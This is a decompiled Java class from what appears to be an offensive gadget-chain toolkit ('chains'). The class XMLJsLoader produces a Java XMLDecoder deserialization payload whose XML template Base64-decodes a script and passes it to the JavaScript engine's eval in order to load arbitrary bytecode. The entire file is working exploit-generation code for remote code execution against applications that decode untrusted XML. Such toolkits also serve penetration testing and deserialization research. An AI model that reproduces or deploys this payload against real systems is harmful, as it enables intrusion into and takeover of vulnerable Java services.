package com.ar3h.chains.gadget.impl.xml;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.gadget.impl.common.expression.JsConvert;
import org.apache.commons.codec.binary.Base64;

@GadgetAnnotation(name = "通过 js 加载字节码", dependencies = {"jdk"})
@GadgetTags(tags = {Tag.XMLDecoderPayload}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/xml/XMLJsLoader.class */
public class XMLJsLoader implements Gadget {
    public static String template = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<java>\n    <void class=\"javax.xml.bind.DatatypeConverter\" method=\"parseBase64Binary\" id=\"str\">\n        <string><![CDATA[%s]]></string>\n    </void>\n    <void class=\"java.lang.String\" id=\"payload\">\n        <object idref=\"str\"></object>\n    </void>    \n    <void class=\"javax.script.ScriptEngineManager\">\n        <void method=\"getEngineByName\">\n            <string>js</string>\n            <void method=\"eval\">\n                <object idref=\"payload\"></object>\n            </void>\n        </void>\n    </void>\n</java>";

    public String getObject(byte[] bArr) {
        return String.format(template, Base64.encodeBase64String(String.format(JsConvert.jsTemplate, Base64.encodeBase64String(bArr)).getBytes()));
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext));
    }
}
